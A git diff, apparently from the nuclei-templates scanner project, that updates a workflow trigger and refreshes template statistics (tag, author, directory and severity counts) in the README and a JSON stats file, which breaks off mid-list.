diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 22f43e7261..669b665655 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -1,9 +1,6 @@ name: 🗒 Templates Stats on: - create: - tags: - - v* workflow_dispatch: jobs: diff --git a/README.md b/README.md index 0b53bebb69..1c489b9cdd 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 | -| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 | -| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 | -| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 | -| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | | -| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 198 | gy741 | 72 | takeovers | 64 | | | | | -| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | | -| cve2020 | 164 | madrobot | 61 | file | 46 | | | | | -| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | | +| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 | +| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 | +| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | +| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 | +| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | +| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 200 | gy741 | 77 | takeovers | 64 | | | | | +| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | | +| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | +| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | -**166 directories, 2144 files**. +**166 directories, 2231 files**. diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 4f0c12d615..df18b61cf9 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":739},{"name":"lfi","count":266},{"name":"panel","count":252},{"name":"xss","count":248},{"name":"wordpress","count":235},{"name":"exposure","count":233},{"name":"rce","count":200},{"name":"tech","count":183},{"name":"cve2020","count":164},{"name":"wp-plugin","count":161},{"name":"cve2021","count":138},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"oob","count":55},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":42},{"name":"sqli","count":38},{"name":"ssrf","count":37},{"name":"","count":37},{"name":"oracle","count":36},{"name":"cve2016","count":36},{"name":"redirect","count":34},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":24},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"auth-bypass","count":21},{"name":"generic","count":20},{"name":"cisco","count":20},{"name":"router","count":19},{"name":"cve2014","count":19},{"name":"aem","count":19},{"name":"misconfig","count":18},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"springboot","count":18},{"name":"php","count":16},{"name":"cve2012","count":14},{"name":"cve2011","count":14},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"android","count":13},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"aws","count":12},{"name":"dlink","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"intrusive","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"vmware","count":8},{"name":"ruijie","count":8},{"name":"scada","count":8},{"name":"cnvd","count":8},{"name":"nginx","count":8},{"name":"backup","count":7},{"name":"confluence","count":7},{"name":"cms","count":7},{"name":"cve2009","count":7},{"name":"files","count":7},{"name":"google","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"ibm","count":7},{"name":"kubernetes","count":7},{"name":"microsoft","count":7},{"name":"camera","count":6},{"name":"rconfig","count":6},{"name":"docker","count":6},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"cve2008","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"django","count":6},{"name":"api","count":6},{"name":"drupal","count":5},{"name":"windows","count":5},{"name":"headless","count":5},{"name":"deserialization","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"jolokia","count":5},{"name":"tomcat","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"hp","count":5},{"name":"fileupload","count":5},{"name":"nodejs","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"dedecms","count":5},{"name":"grafana","count":4},{"name":"resin","count":4},{"name":"firmware","count":4},{"name":"solarwinds","count":4},{"name":"wso2","count":4},{"name":"hongdian","count":4},{"name":"zimbra","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"artifactory","count":4},{"name":"samsung","count":4},{"name":"symfony","count":4},{"name":"magmi","count":4},{"name":"thinkcmf","count":4},{"name":"zabbix","count":4},{"name":"strapi","count":4},{"name":"git","count":4},{"name":"traversal","count":4},{"name":"webserver","count":4},{"name":"symantec","count":4},{"name":"moodle","count":4},{"name":"elastic","count":4},{"name":"rfi","count":4},{"name":"proxy","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"crlf","count":4},{"name":"asp","count":4},{"name":"exchange","count":4},{"name":"tikiwiki","count":3},{"name":"bitrix","count":3},{"name":"mongodb","count":3},{"name":"vbulletin","count":3},{"name":"targa","count":3},{"name":"caucho","count":3},{"name":"slack","count":3},{"name":"firebase","count":3},{"name":"hoteldruid","count":3},{"name":"jellyfin","count":3},{"name":"injection","count":3},{"name":"springcloud","count":3},{"name":"prometheus","count":3},{"name":"opensis","count":3},{"name":"openam","count":3},{"name":"backups","count":3},{"name":"fpd","count":3},{"name":"cacti","count":3},{"name":"itop","count":3},{"name":"ssh","count":3},{"name":"smtp","count":3},{"name":"telerik","count":3},{"name":"kevinlab","count":3},{"name":"azure","count":3},{"name":"nosqli","count":3},{"name":"zhiyuan","count":3},{"name":"nacos","count":3},{"name":"mail","count":3},{"name":"microstrategy","count":3},{"name":"amazon","count":3},{"name":"linkerd","count":3},{"name":"r-seenet","count":3},{"name":"kafka","count":3},{"name":"ebs","count":3},{"name":"log","count":3},{"name":"npm","count":3},{"name":"httpd","count":3},{"name":"ofbiz","count":3},{"name":"oa","count":3},{"name":"openssh","count":3},{"name":"kibana","count":3},{"name":"jeesns","count":3},{"name":"fanruan","count":3},{"name":"druid","count":3},{"name":"terramaster","count":3},{"name":"nexus","count":3},{"name":"lfr","count":3},{"name":"bigip","count":3},{"name":"totemomail","count":2},{"name":"nextcloud","count":2},{"name":"leak","count":2},{"name":"activemq","count":2},{"name":"natshell","count":2},{"name":"pega","count":2},{"name":"hashicorp","count":2},{"name":"ecology","count":2},{"name":"igs","count":2},{"name":"voipmonitor","count":2},{"name":"splunk","count":2},{"name":"xxljob","count":2},{"name":"linux","count":2},{"name":"dolibarr","count":2},{"name":"geowebserver","count":2},{"name":"paloalto","count":2},{"name":"prtg","count":2},{"name":"showdoc","count":2},{"name":"axis2","count":2},{"name":"kentico","count":2},{"name":"sonarqube","count":2},{"name":"rstudio","count":2},{"name":"openfire","count":2},{"name":"service","count":2},{"name":"jsf","count":2},{"name":"horde","count":2},{"name":"dos","count":2},{"name":"ilo","count":2},{"name":"mida","count":2},{"name":"hostheader-injection","count":2},{"name":"bypass","count":2},{"name":"wordfence","count":2},{"name":"emerge","count":2},{"name":"sonicwall","count":2},{"name":"hjtcloud","count":2},{"name":"node","count":2},{"name":"waf","count":2},{"name":"seeyon","count":2},{"name":"akkadian","count":2},{"name":"sharepoint","count":2},{"name":"akamai","count":2},{"name":"idrac","count":2},{"name":"chamilo","count":2},{"name":"avantfax","count":2},{"name":"cve2005","count":2},{"name":"minio","count":2},{"name":"yapi","count":2},{"name":"rockmongo","count":2},{"name":"getsimple","count":2},{"name":"favicon","count":2},{"name":"nagios","count":2},{"name":"glassfish","count":2},{"name":"cache","count":2},{"name":"yii","count":2},{"name":"icewarp","count":2},{"name":"openvpn","count":2},{"name":"ucmdb","count":2},{"name":"trixbox","count":2},{"name":"ecoa","count":2},{"name":"ec2","count":2},{"name":"backdoor","count":2},{"name":"flir","count":2},{"name":"frp","count":2},{"name":"vrealize","count":2},{"name":"odoo","count":2},{"name":"commax","count":2},{"name":"grav","count":2},{"name":"oauth","count":2},{"name":"wuzhicms","count":2},{"name":"keycloak","count":2},{"name":"plesk","count":2},{"name":"jeedom","count":2},{"name":"storage","count":2},{"name":"db","count":2},{"name":"globalprotect","count":2},{"name":"jboss","count":2},{"name":"bucket","count":2},{"name":"github","count":2},{"name":"netsweeper","count":2},{"name":"status","count":2},{"name":"qcubed","count":2},{"name":"fortios","count":2},{"name":"enumeration","count":2},{"name":"axis","count":2},{"name":"adminer","count":2},{"name":"mcafee","count":2},{"name":"guacamole","count":2},{"name":"spark","count":2},{"name":"maian","count":2},{"name":"webcam","count":2},{"name":"kong","count":2},{"name":"liferay","count":2},{"name":"shellshock","count":2},{"name":"hasura","count":2},{"name":"netis","count":2},{"name":"harbor","count":2},{"name":"nextjs","count":2},{"name":"middleware","count":2},{"name":"huawei","count":2},{"name":"bruteforce","count":2},{"name":"sitecore","count":2},{"name":"phpcollab","count":2},{"name":"smb","count":2},{"name":"cve2007","count":2},{"name":"hpe","count":2},{"name":"saltstack","count":2},{"name":"prestashop","count":2},{"name":"couchdb","count":2},{"name":"aruba","count":2},{"name":"chiyu","count":2},{"name":"beanshell","count":1},{"name":"livezilla","count":1},{"name":"plone","count":1},{"name":"alertmanager","count":1},{"name":"sqlite","count":1},{"name":"gespage","count":1},{"name":"circontrorl","count":1},{"name":"embedthis","count":1},{"name":"dom","count":1},{"name":"pacsone","count":1},{"name":"fortinet","count":1},{"name":"tjws","count":1},{"name":"resourcespace","count":1},{"name":"zyxel","count":1},{"name":"olivetti","count":1},{"name":"netgenie","count":1},{"name":"arl","count":1},{"name":"javafaces","count":1},{"name":"basic-auth","count":1},{"name":"meraki","count":1},{"name":"wing-ftp","count":1},{"name":"postgres","count":1},{"name":"pcoip","count":1},{"name":"vcenter","count":1},{"name":"sourcebans","count":1},{"name":"bolt","count":1},{"name":"rdp","count":1},{"name":"cockpit","count":1},{"name":"triconsole","count":1},{"name":"bazarr","count":1},{"name":"rujjie","count":1},{"name":"xmlchart","count":1},{"name":"lotuscms","count":1},{"name":"huijietong","count":1},{"name":"phpwiki","count":1},{"name":"clink-office","count":1},{"name":"tongda","count":1},{"name":"gogs","count":1},{"name":"nomad","count":1},{"name":"feifeicms","count":1},{"name":"tieline","count":1},{"name":"realteo","count":1},{"name":"linksys","count":1},{"name":"servicedesk","count":1},{"name":"dnssec","count":1},{"name":"gateone","count":1},{"name":"blind","count":1},{"name":"concrete","count":1},{"name":"kafdrop","count":1},{"name":"mdb","count":1},{"name":" default-login","count":1},{"name":"announcekit","count":1},{"name":"acontent","count":1},{"name":"okta","count":1},{"name":"pgadmin","count":1},{"name":"shoppable","count":1},{"name":"adb","count":1},{"name":"centreon","count":1},{"name":"shopware","count":1},{"name":"dvwa","count":1},{"name":"shoretel","count":1},{"name":"asus","count":1},{"name":"expressjs","count":1},{"name":"tcexam","count":1},{"name":"artica","count":1},{"name":"calendarix","count":1},{"name":"perl","count":1},{"name":"csod","count":1},{"name":"phpfusion","count":1},{"name":"b2evolution","count":1},{"name":"twitter-server","count":1},{"name":"octobercms","count":1},{"name":"websphere","count":1},{"name":"timesheet","count":1},{"name":"bedita","count":1},{"name":"oidc","count":1},{"name":"alerta","count":1},{"name":"ns","count":1},{"name":"circontrol","count":1},{"name":"mantisbt","count":1},{"name":"jfrog","count":1},{"name":"webftp","count":1},{"name":"clickhouse","count":1},{"name":"cloudinary","count":1},{"name":"centos","count":1},{"name":"mautic","count":1},{"name":"tectuus","count":1},{"name":"xml","count":1},{"name":"werkzeug","count":1},{"name":"diris","count":1},{"name":"pippoint","count":1},{"name":"wazuh","count":1},{"name":"gsoap","count":1},{"name":"bash","count":1},{"name":"vscode","count":1},{"name":"trane","count":1},{"name":"webmodule-ee","count":1},{"name":"database","count":1},{"name":"sql","count":1},{"name":"ambari","count":1},{"name":"checkpoint","count":1},{"name":"zms","count":1},{"name":"cscart","count":1},{"name":"rabbitmq","count":1},{"name":"wondercms","count":1},{"name":"smi","count":1},{"name":"sentry","count":1},{"name":"wamp","count":1},{"name":"hadoop","count":1},{"name":"gitea","count":1},{"name":"robomongo","count":1},{"name":"servicenow","count":1},{"name":"mpsec","count":1},{"name":"csrf","count":1},{"name":"labtech","count":1},{"name":"cofax","count":1},{"name":"listserv","count":1},{"name":"zm","count":1},{"name":"craftcms","count":1},{"name":"terraform","count":1},{"name":"jaspersoft","count":1},{"name":"wmt","count":1},{"name":"lutron","count":1},{"name":"xiuno","count":1},{"name":"burp","count":1},{"name":"opensmtpd","count":1},{"name":"vidyo","count":1},{"name":"portainer","count":1},{"name":"redwood","count":1},{"name":"cloudflare","count":1},{"name":"razor","count":1},{"name":"socomec","count":1},{"name":"ueditor","count":1},{"name":"codeigniter","count":1},{"name":"svn","count":1},{"name":"rubedo","count":1},{"name":"totaljs","count":1},{"name":"eyelock","count":1},{"name":"etherpad","count":1},{"name":"emby","count":1},{"name":"tika","count":1},{"name":"lanproxy","count":1},{"name":"ghost","count":1},{"name":"natemail","count":1},{"name":"fastapi","count":1},{"name":"sangfor","count":1},{"name":"mrtg","count":1},{"name":"tensorflow","count":1},{"name":"metabase","count":1},{"name":"starttls","count":1},{"name":"szhe","count":1},{"name":"rocketchat","count":1},{"name":"sar2html","count":1},{"name":"netrc","count":1},{"name":"office365","count":1},{"name":"chyrp","count":1},{"name":"skywalking","count":1},{"name":"viewlinc","count":1},{"name":"turbocrm","count":1},{"name":"chinaunicom","count":1},{"name":"mailchimp","count":1},{"name":"viewpoint","count":1},{"name":"shiro","count":1},{"name":"ilo4","count":1},{"name":"oscommerce","count":1},{"name":"wildfly","count":1},{"name":"pmb","count":1},{"name":"aspnuke","count":1},{"name":"clockwork","count":1},{"name":"spectracom","count":1},{"name":"redcap","count":1},{"name":"iceflow","count":1},{"name":"cse","count":1},{"name":"sureline","count":1},{"name":"74cms","count":1},{"name":"nuuo","count":1},{"name":"mysql","count":1},{"name":"redhat","count":1},{"name":"phpfastcache","count":1},{"name":"argussurveillance","count":1},{"name":"traefik","count":1},{"name":"mariadb","count":1},{"name":"simplecrm","count":1},{"name":"clave","count":1},{"name":"auth","count":1},{"name":"spring","count":1},{"name":"fortilogger","count":1},{"name":"hiawatha","count":1},{"name":"gilacms","count":1},{"name":"avtech","count":1},{"name":"shopizer","count":1},{"name":"lg-nas","count":1},{"name":"krweb","count":1},{"name":"metinfo","count":1},{"name":"hiboss","count":1},{"name":"ognl","count":1},{"name":"addpac","count":1},{"name":"redis","count":1},{"name":"glances","count":1},{"name":"zzzcms","count":1},{"name":"primetek","count":1},{"name":"woocommerce","count":1},{"name":"springframework","count":1},{"name":"xvr","count":1},{"name":"owasp","count":1},{"name":"tpshop","count":1},{"name":"selea","count":1},{"name":"anchorcms","count":1},{"name":"zarafa","count":1},{"name":"dotnetnuke","count":1},{"name":"iptime","count":1},{"name":"fastcgi","count":1},{"name":"yealink","count":1},{"name":"motorola","count":1},{"name":"gloo","count":1},{"name":"webadmin","count":1},{"name":"h3c-imc","count":1},{"name":"kyan","count":1},{"name":"dbeaver","count":1},{"name":"nweb2fax","count":1},{"name":"extractor","count":1},{"name":"moinmoin","count":1},{"name":"kubeflow","count":1},{"name":"eprints","count":1},{"name":"panasonic","count":1},{"name":"frontpage","count":1},{"name":"ecom","count":1},{"name":"elasticsearch","count":1},{"name":"apiman","count":1},{"name":"karel","count":1},{"name":"goahead","count":1},{"name":"nuxeo","count":1},{"name":"crm","count":1},{"name":"grails","count":1},{"name":"tor","count":1},{"name":"biometrics","count":1},{"name":"plastic","count":1},{"name":"zookeeper","count":1},{"name":"expn","count":1},{"name":"fortigates","count":1},{"name":"woocomernce","count":1},{"name":"sgp","count":1},{"name":"clockwatch","count":1},{"name":"salesforce","count":1},{"name":"ssl","count":1},{"name":"graphite","count":1},{"name":"kerbynet","count":1},{"name":"nps","count":1},{"name":"netmask","count":1},{"name":"tileserver","count":1},{"name":"novnc","count":1},{"name":"appweb","count":1},{"name":"majordomo2","count":1},{"name":"haproxy","count":1},{"name":"glowroot","count":1},{"name":"redmine","count":1},{"name":"nedi","count":1},{"name":"linkedin","count":1},{"name":"gurock","count":1},{"name":"nifi","count":1},{"name":"sarg","count":1},{"name":"apos","count":1},{"name":"whm","count":1},{"name":"tracer","count":1},{"name":"phpinfo","count":1},{"name":"clusterengine","count":1},{"name":"thinkadmin","count":1},{"name":"opensns","count":1},{"name":"couchbase","count":1},{"name":"scimono","count":1},{"name":"memcached","count":1},{"name":"blue-ocean","count":1},{"name":"jeewms","count":1},{"name":"fortiweb","count":1},{"name":"zte","count":1},{"name":"sco","count":1},{"name":"qsan","count":1},{"name":"dvr","count":1},{"name":"dotclear","count":1},{"name":"alibaba","count":1},{"name":"hortonworks","count":1},{"name":"daybyday","count":1},{"name":"myvuehelp","count":1},{"name":"default","count":1},{"name":"etouch","count":1},{"name":"processmaker","count":1},{"name":"discord","count":1},{"name":"proftpd","count":1},{"name":"lotus","count":1},{"name":"cerebro","count":1},{"name":"comodo","count":1},{"name":"miscrsoft","count":1},{"name":"duomicms","count":1},{"name":"xdcms","count":1},{"name":"tidb","count":1},{"name":"payara","count":1},{"name":"k8s","count":1},{"name":"darkstat","count":1},{"name":"rhymix","count":1},{"name":"st","count":1},{"name":"logontracer","count":1},{"name":"sidekiq","count":1},{"name":"sophos","count":1},{"name":"javascript","count":1},{"name":"ems","count":1},{"name":"wiki","count":1},{"name":"landrayoa","count":1},{"name":"heroku","count":1},{"name":"keenetic","count":1},{"name":"zeroshell","count":1},{"name":"maccmsv10","count":1},{"name":"emc","count":1},{"name":"sceditor","count":1},{"name":"nordex","count":1},{"name":"parentlink","count":1},{"name":"landray","count":1},{"name":"varnish","count":1},{"name":"fuelcms","count":1},{"name":"kindeditor","count":1},{"name":"dompdf","count":1},{"name":"acme","count":1},{"name":"idemia","count":1},{"name":"upload","count":1},{"name":"chevereto","count":1},{"name":"gotmls","count":1},{"name":"moin","count":1},{"name":"pulsesecure","count":1},{"name":"commscope","count":1},{"name":"soar","count":1},{"name":"mediumish","count":1},{"name":"webmin","count":1},{"name":"api-manager","count":1},{"name":"lighttpd","count":1},{"name":"lansweeper","count":1},{"name":"yachtcontrol","count":1},{"name":"nexusdb","count":1},{"name":"opencast","count":1},{"name":"exponentcms","count":1},{"name":"pihole","count":1},{"name":"openerp","count":1},{"name":"fortigate","count":1},{"name":"ulterius","count":1},{"name":"myucms","count":1},{"name":"openrestry","count":1},{"name":"jquery","count":1},{"name":"rsyncd","count":1},{"name":"klog","count":1},{"name":"webui","count":1},{"name":"visualtools","count":1},{"name":"exacqvision","count":1},{"name":"monitorix","count":1},{"name":"upnp","count":1},{"name":"empirecms","count":1},{"name":"solarlog","count":1},{"name":"avalanche","count":1},{"name":"node-red-dashboard","count":1},{"name":"tenda","count":1},{"name":"expose","count":1},{"name":"gitlist","count":1},{"name":"synnefo","count":1},{"name":"plugin","count":1},{"name":"ruby","count":1},{"name":"zcms","count":1},{"name":"zmanda","count":1},{"name":"bitly","count":1},{"name":"solman","count":1},{"name":"codemeter","count":1},{"name":"visionhub","count":1},{"name":"qvisdvr","count":1},{"name":"exposures","count":1},{"name":"nimble","count":1},{"name":"panabit","count":1},{"name":"maxsite","count":1},{"name":"mara","count":1},{"name":"nette","count":1},{"name":"smartblog","count":1},{"name":"owa","count":1},{"name":"smartsense","count":1},{"name":"plc","count":1},{"name":"netdata","count":1},{"name":"pyramid","count":1},{"name":"rmi","count":1},{"name":"mobileiron","count":1},{"name":"octoprint","count":1},{"name":"cocoon","count":1},{"name":"wavlink","count":1},{"name":"cve2006","count":1},{"name":"htmli","count":1},{"name":"ioncube","count":1},{"name":"flink","count":1},{"name":"eyou","count":1},{"name":"nc2","count":1},{"name":"drone","count":1},{"name":"stem","count":1},{"name":"swagger","count":1},{"name":"bullwark","count":1},{"name":"cloudron","count":1},{"name":"spidercontrol","count":1},{"name":"geddy","count":1},{"name":"froxlor","count":1},{"name":"scs","count":1},{"name":"opentsdb","count":1},{"name":"timeclock","count":1},{"name":"blackboard","count":1},{"name":"azkaban","count":1},{"name":"svnserve","count":1},{"name":"fedora","count":1},{"name":"postmessage","count":1},{"name":"actuator","count":1},{"name":"spf","count":1},{"name":"dotnet","count":1},{"name":"optiLink","count":1},{"name":"mirai","count":1},{"name":"ewebs","count":1},{"name":"magicflow","count":1},{"name":"nsasg","count":1},{"name":"setup","count":1},{"name":"mongoshake","count":1},{"name":"minimouse","count":1},{"name":"xunchi","count":1},{"name":"seacms","count":1},{"name":"shopxo","count":1},{"name":"s3","count":1},{"name":"interlib","count":1},{"name":"gstorage","count":1},{"name":"fiori","count":1},{"name":"email","count":1},{"name":"uwsgi","count":1},{"name":"vsphere","count":1},{"name":"testrail","count":1},{"name":"domxss","count":1},{"name":"vsftpd","count":1},{"name":"acexy","count":1},{"name":"faraday","count":1},{"name":"accela","count":1},{"name":"jenzabar","count":1},{"name":"sage","count":1},{"name":"panos","count":1},{"name":"ganglia","count":1},{"name":"bigbluebutton","count":1},{"name":"cgi","count":1},{"name":"eg","count":1},{"name":"rmc","count":1},{"name":"gridx","count":1},{"name":"wooyun","count":1},{"name":"cherokee","count":1},{"name":"sprintful","count":1},{"name":"openstack","count":1},{"name":"lancom","count":1},{"name":"omi","count":1},{"name":"subrion","count":1},{"name":"oneblog","count":1},{"name":"discourse","count":1},{"name":"phalcon","count":1},{"name":"graphql","count":1},{"name":"zenario","count":1},{"name":"javamelody","count":1},{"name":"elascticsearch","count":1},{"name":"saltapi","count":1},{"name":"powercreator","count":1},{"name":"jsp","count":1},{"name":"mantis","count":1},{"name":"openx","count":1},{"name":"bookstack","count":1},{"name":"elfinder","count":1},{"name":"esmtp","count":1},{"name":"monitorr","count":1},{"name":"weiphp","count":1},{"name":"xampp","count":1},{"name":"achecker","count":1},{"name":"ricoh","count":1},{"name":"ruckus","count":1},{"name":"camunda","count":1},{"name":"cyberoam","count":1},{"name":"tapestry","count":1},{"name":"mongo","count":1},{"name":"zend","count":1},{"name":"wifisky","count":1},{"name":"episerver","count":1},{"name":"cors","count":1},{"name":"tensorboard","count":1},{"name":"doh","count":1},{"name":"geutebruck","count":1},{"name":"wavemaker","count":1},{"name":"openemr","count":1},{"name":"tamronos","count":1},{"name":"influxdb","count":1},{"name":"qdpm","count":1},{"name":"aura","count":1},{"name":"erp-nc","count":1},{"name":"trilithic","count":1},{"name":"pagespeed","count":1},{"name":"jenkin","count":1},{"name":"finereport","count":1},{"name":"spip","count":1},{"name":"ntopng","count":1},{"name":"imap","count":1},{"name":"gunicorn","count":1},{"name":"vnc","count":1},{"name":"k8","count":1},{"name":"jnoj","count":1},{"name":"jmx","count":1},{"name":"floc","count":1},{"name":"opm","count":1},{"name":"phpunit","count":1},{"name":"luftguitar","count":1},{"name":"beanstalk","count":1},{"name":"jitsi","count":1},{"name":"websvn","count":1},{"name":"ssltls","count":1},{"name":"cobub","count":1},{"name":"graylog","count":1},{"name":"rockethchat","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":268},{"name":"daffainfo","count":217},{"name":"pdteam","count":195},{"name":"geeknik","count":154},{"name":"dwisiswant0","count":131},{"name":"gy741","count":76},{"name":"pussycat0x","count":69},{"name":"princechaddha","count":61},{"name":"madrobot","count":61},{"name":"0x_akoko","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"0x240x23elu","count":7},{"name":"emadshanab","count":7},{"name":"dogasantos","count":7},{"name":"harshbothra_","count":7},{"name":"oppsec","count":7},{"name":"randomstr1ng","count":7},{"name":"techryptic (@tech)","count":7},{"name":"kophjager007","count":7},{"name":"meme-lord","count":7},{"name":"dr_set","count":7},{"name":"logicalhunter","count":6},{"name":"pentest_swissky","count":6},{"name":"__fazal","count":6},{"name":"puzzlepeaches","count":6},{"name":"caspergn","count":6},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"iamnoooob","count":5},{"name":"rootxharsh","count":5},{"name":"elsfa7110","count":5},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"unstabl3","count":3},{"name":"0w4ys","count":3},{"name":"binaryfigments","count":3},{"name":"fyoorer","count":3},{"name":"vsh00t","count":3},{"name":"incogbyte","count":3},{"name":"jarijaas","count":3},{"name":"tess","count":3},{"name":"z3bd","count":3},{"name":"shine","count":3},{"name":"johnk3r","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"dudez","count":3},{"name":"f1tz","count":3},{"name":"_generic_human_","count":3},{"name":"emenalf","count":3},{"name":"thomas_from_offensity","count":3},{"name":"skeltavik","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"idealphase","count":3},{"name":"mavericknerd","count":3},{"name":"sushantkamble","count":3},{"name":"hetroublemakr","count":2},{"name":"socketz","count":2},{"name":"lotusdll","count":2},{"name":"johnjhacking","count":2},{"name":"moritz nentwig","count":2},{"name":"randomrobbie","count":2},{"name":"vavkamil","count":2},{"name":"nkxxkn","count":2},{"name":"cocxanh","count":2},{"name":"afaq","count":2},{"name":"joeldeleep","count":2},{"name":"sullo","count":2},{"name":"pxmme1337","count":2},{"name":"alifathi-h1","count":2},{"name":"swissky","count":2},{"name":"bsysop","count":2},{"name":"arcc","count":2},{"name":"mohammedsaneem","count":2},{"name":"ree4pwn","count":2},{"name":"bernardofsr","count":2},{"name":"gal nagli","count":2},{"name":"0xsapra","count":2},{"name":"g4l1t0","count":2},{"name":"bp0lr","count":2},{"name":"w4cky_","count":2},{"name":"koti2","count":2},{"name":"dheerajmadhukar","count":2},{"name":"fabaff","count":2},{"name":"davidmckennirey","count":2},{"name":"manas_harsh","count":2},{"name":"r3naissance","count":2},{"name":"huowuzhao","count":2},{"name":"whoever","count":2},{"name":"ehsahil","count":2},{"name":"zomsop82","count":2},{"name":"0xsmiley","count":2},{"name":"0xprial","count":2},{"name":"kiblyn11","count":2},{"name":"foulenzer","count":2},{"name":"amsda","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"convisoappsec","count":2},{"name":"gevakun","count":2},{"name":"0xelkomy","count":2},{"name":"x1m_martijn","count":2},{"name":"hahwul","count":2},{"name":"parth","count":2},{"name":"0xcrypto","count":2},{"name":"0xrudra","count":2},{"name":"udit_thakkur","count":2},{"name":"random-robbie","count":2},{"name":"bing0o","count":2},{"name":"revblock","count":1},{"name":"adrianmf","count":1},{"name":"me9187","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"borna nematzadeh","count":1},{"name":"@dwisiswant0","count":1},{"name":"iampritam","count":1},{"name":"c3l3si4n","count":1},{"name":"sicksec","count":1},{"name":"luskabol","count":1},{"name":"ringo","count":1},{"name":"thezakman","count":1},{"name":"deena","count":1},{"name":"raesene","count":1},{"name":"shelld3v","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"zhenwarx","count":1},{"name":"affix","count":1},{"name":"jteles","count":1},{"name":"ahmetpergamum","count":1},{"name":"taielab","count":1},{"name":"notsoevilweasel","count":1},{"name":"ahmed sherif","count":1},{"name":"aresx","count":1},{"name":"pdp","count":1},{"name":"hanlaomo","count":1},{"name":"mhdsamx","count":1},{"name":"zandros0","count":1},{"name":"akash.c","count":1},{"name":"_darrenmartyn","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"infosecsanyam","count":1},{"name":"kurohost","count":1},{"name":"alph4byt3","count":1},{"name":"nytr0gen","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"undefl0w","count":1},{"name":"sshell","count":1},{"name":"jeya seelan","count":1},{"name":"intx0x80","count":1},{"name":"tirtha_mandal","count":1},{"name":"ratnadip 